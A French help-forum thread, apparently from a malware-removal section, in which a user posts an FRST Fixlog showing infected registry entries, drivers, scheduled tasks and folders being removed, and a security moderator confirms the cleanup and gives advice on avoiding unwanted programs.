"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => supprimé(es) avec succès
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => impossible à supprimer, clé était peut-être protégé(e)
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\Software\Microsoft\Windows\CurrentVersion\Run\\BillowingWind" => supprimé(es) avec succès
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\Software\Microsoft\Windows\CurrentVersion\Run\\A1DADOPPE8F6HAO" => supprimé(es) avec succès
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\" => supprimé(es) avec succès
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{68f97705-51f3-11e8-9d02-9822ef1caefe}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{68f97705-51f3-11e8-9d02-9822ef1caefe} => non trouvé(e)
"C:\ProgramData\Subair\Zamtough.dll" => Données de la valeur supprimé(es) avec succès
"C:\ProgramData\Subair\Matcom.dll" => Données de la valeur supprimé(es) avec succès
C:\WINDOWS\system32\Drivers\jesqkqqi.sys => déplacé(es) avec succès
"C:\Users\2s\Desktop\adwcleaner-7-0-7-0.exe" => non trouvé(e)
C:\Users\2s\AppData\Local\ElevatedDiagnostics => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\wccmctpk.sys => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\wivzpefe.sys => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\hzmsqsbe.sys => déplacé(es) avec succès
"C:\Program Files (x86)\ATF_Cleaner" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\XLqsfoKFUKuTqG" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\WobUIKhuMtTTi2" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\KnPQHVchzdGfrlHaz2" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\TdqeVjasHzsikvrWtEm2" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\rArHIXNWKfbeRtR2" => non trouvé(e)
"C:\ProgramData\XjOPTLXDzAynQaVB" => non trouvé(e)
"C:\Program Files (x86)\wCCFxMJCsZmzC" => non trouvé(e)
"C:\Program Files (x86)\OxoywZINBbQwrioRGrR" => non trouvé(e)
"C:\Program Files (x86)\lJFUJMGEHIE" => non trouvé(e)
"C:\Program Files (x86)\iRmKFyAZyPUn" => non trouvé(e)
"C:\Program Files (x86)\ijcQGTqqPStU2" => non trouvé(e)
C:\Users\2s\AppData\Roaming\gpbxpbqxmdw => déplacé(es) avec succès
"C:\Program Files (x86)\EgDGbQEiU" => non trouvé(e)
"C:\Program Files\YTZTX5HWMR" => non trouvé(e)
C:\Users\2s\AppData\Roaming\uziyf0umul5 => déplacé(es) avec succès
"C:\Program Files\FH98R5I5YJ" => non trouvé(e)
C:\Users\2s\AppData\Roaming\raj0v241spm => déplacé(es) avec succès
"C:\Program Files\8Z4GUCKJPK" => non trouvé(e)
"C:\ProgramData\Microsoft Toolkit" => non trouvé(e)
C:\Users\2s\Desktop\MTKV263.zip => déplacé(es) avec succès
C:\Users\2s\Desktop\Devis de prestation de service (Pour Elexpert) (1).pdf => déplacé(es) avec succès
C:\WINDOWS\system32\appmgmt => déplacé(es) avec succès
"C:\Program Files\IDFYG9HHO5" => non trouvé(e)
"C:\Program Files\6Y39LUKVBJ" => non trouvé(e)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Deployment => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Apps\2.0 => déplacé(es) avec succès
C:\Program Files (x86)\JAcqddADqIE => déplacé(es) avec succès
C:\Program Files (x86)\NExnNAYCpUUn => déplacé(es) avec succès
C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR => déplacé(es) avec succès
C:\Program Files (x86)\SvnSzzIscGyUC => déplacé(es) avec succès
C:\Program Files (x86)\EPVqpVJyVSWU2 => déplacé(es) avec succès
C:\Program Files (x86)\KCGHGVOnU => déplacé(es) avec succès
"C:\WINDOWS\system32\mcicda64.dll" => non trouvé(e)
C:\Users\2s\AppData\Roaming\2pqqlm5b2kp => déplacé(es) avec succès
C:\Users\2s\AppData\Roaming\r5dqdoik5wr => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\wAJDAAZgOBCdyQgsK2" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\TUZwhpCbnzWcBoUhWSI2" => non trouvé(e)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MalwareFox AntiMalware => déplacé(es) avec succès
C:\WINDOWS\ZAM.krnl.trace => déplacé(es) avec succès
C:\WINDOWS\ZAM_Guard.krnl.trace => déplacé(es) avec succès
C:\Program Files (x86)\MalwareFox AntiMalware => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\zamguard64.sys => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\zam64.sys => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Zemana => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Wolf of Webstreet OPC Private Limited => déplacé(es) avec succès
C:\Users\2s\AppData\Roaming\qyxavgbtyty => déplacé(es) avec succès
C:\Users\2s\AppData\Roaming\ffhddztanil => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\IP Relub" => non trouvé(e)
C:\autoexec.bat => déplacé(es) avec succès
"C:\Users\2s\AppData\Roaming\SystemHealer" => non trouvé(e)
"C:\Program Files (x86)\FastDataX" => non trouvé(e)
"C:\Users\2s\AppData\Roaming\FastDataX" => non trouvé(e)
C:\Users\2s\AppData\Roaming\3nk4x03n5t3 => déplacé(es) avec succès
C:\Users\2s\AppData\Roaming\Macromedia => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\ImpoperViewer" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\jbDyCmJOWCzWzi" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\RuvZlWnxKNkmGuM2" => non trouvé(e)
C:\Users\2s\AppData\Roaming\0hzygrghqs2 => déplacé(es) avec succès
C:\Users\2s\AppData\Roaming\ftwdngd03dc => déplacé(es) avec succès
C:\Users\2s\AppData\Roaming\mwugkltykxi => déplacé(es) avec succès
C:\Users\2s\ntuser.pol => déplacé(es) avec succès
"C:\ProgramData\ntuser.pol" => non trouvé(e)
C:\Users\2s\AppData\Roaming\rncxnmqbgrj => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\psv_FixSing" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\psv_Sailcore" => non trouvé(e)
C:\Users\2s\AppData\Roaming\Mozilla => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Tampzap.tst => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Bamplus.bin => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\psv_GeoSailfax" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\psv_Scot-Lam" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\psv_JobGocof" => non trouvé(e)
C:\ProgramData\Voyasollams => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Grave-Com.bin => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Tampzap.exe => déplacé(es) avec succès
"C:\Users\2s\AppData\Local\XService" => non trouvé(e)
"C:\WINDOWS\windefender.exe" => non trouvé(e)
C:\Users\2s\AppData\Roaming\b1r11f5cjuf => déplacé(es) avec succès
C:\Users\2s\AppData\LocalLow\iAiaDuTGfHtGg => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\psv_ZumApron" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\psv_TresDancof" => non trouvé(e)
"C:\Users\2s\AppData\Roaming\jw4ivehcxcm" => non trouvé(e)
"C:\Users\2s\AppData\Roaming\EpicNet Inc" => non trouvé(e)
C:\Program Files (x86)\trs => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\psv_FreshRemtax" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\psv_Solo-Stock" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\psv_ZoomEco" => non trouvé(e)
C:\Users\2s\AppData\Roaming\WidModule => déplacé(es) avec succès
C:\Users\2s\AppData\Local\noah.dat => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Config.xml => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Main.dat => déplacé(es) avec succès
C:\Users\2s\AppData\Local\md.xml => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Dongtom.tst => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask => déplacé(es) avec succès
C:\Program Files\My Program => déplacé(es) avec succès
C:\ProgramData\yahoochrome_D => déplacé(es) avec succès
C:\Users\2s\AppData\Local\K-is.bin => déplacé(es) avec succès
C:\Users\2s\AppData\Local\Dongtom.exe => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\ScheduledUpdate" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\csrss" => non trouvé(e)
C:\WINDOWS\rss => déplacé(es) avec succès
C:\Users\2s\AppData\Local\sham.db => déplacé(es) avec succès
C:\WINDOWS\Tasks\Updater_Online_Application.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G6.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G5.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G4.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G3.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G2.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G1.job => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\Updater_Online_Application" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Online Application V2G6" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Online Application V2G5" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Online Application V2G4" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Online Application V2G3" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Online Application V2G2" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Online Application V2G1" => non trouvé(e)
C:\Program Files (x86)\foldershare => déplacé(es) avec succès
C:\Users\Public\Documents\XMUpdate => déplacé(es) avec succès
"C:\Program Files\AutoCAD 2010" => non trouvé(e)
C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3392FECE-DEB2-4177-8D46-BABD458AA14F} => déplacé(es) avec succès
C:\ProgramData\FLEXnet => déplacé(es) avec succès

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-1591057960-2417521308-250896843-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès

========= Fin de RemoveProxy: =========

=========== EmptyTemp: ==========

BITS transfer queue => 8151040 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 43683791 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 5036065 B
Edge => 153619874 B
Chrome => 340560621 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 151074 B
systemprofile32 => 0 B
LocalService => 9914 B
NetworkService => 120100 B
defaultuser0.DESKTOP-URLBG75 => 0 B
2s => 760827801 B

RecycleBin => 4477456 B
EmptyTemp: => 1.2 GB données temporaires supprimées.

================================

Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 03-06-2018 14:23:18)

Résultats de la suppression planifiée des clés après redémarrage:

"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => supprimé(es) avec succès

Fin de Fixlog 14:23:18

Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 685

ok fais le reste.

saidclecde Messages postés 4 Date d'inscription Statut Membre Dernière intervention

https://pjjoint.malekal.com/files.php?id=FRST_20180603_v5m12u15l14m6

https://pjjoint.malekal.com/files.php?id=20180603_s5d12q5p10w5

je crois que ça marché

Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 685 > saidclecde Messages postés 4 Date d'inscription Statut Membre Dernière intervention

Malwarebytes fonctionne ?

saidclecde Messages postés 4 Date d'inscription Statut Membre Dernière intervention

Bonsoir

Oui ç'a fonctionné parfaitement

Merci infiniment

Réponse 3 / 3

Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 24 685

ok,
arrete de télécharger n'importe quoi =)

Supprime le dossier C:\FRST

Fais des analyses régulières avec MBAM.
Evite les analyses et nettoyages réguliers ZHPCleaner, AdwCleaner, pas utile.

Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

Fin de Fixlog 14:23:18

Votre réponse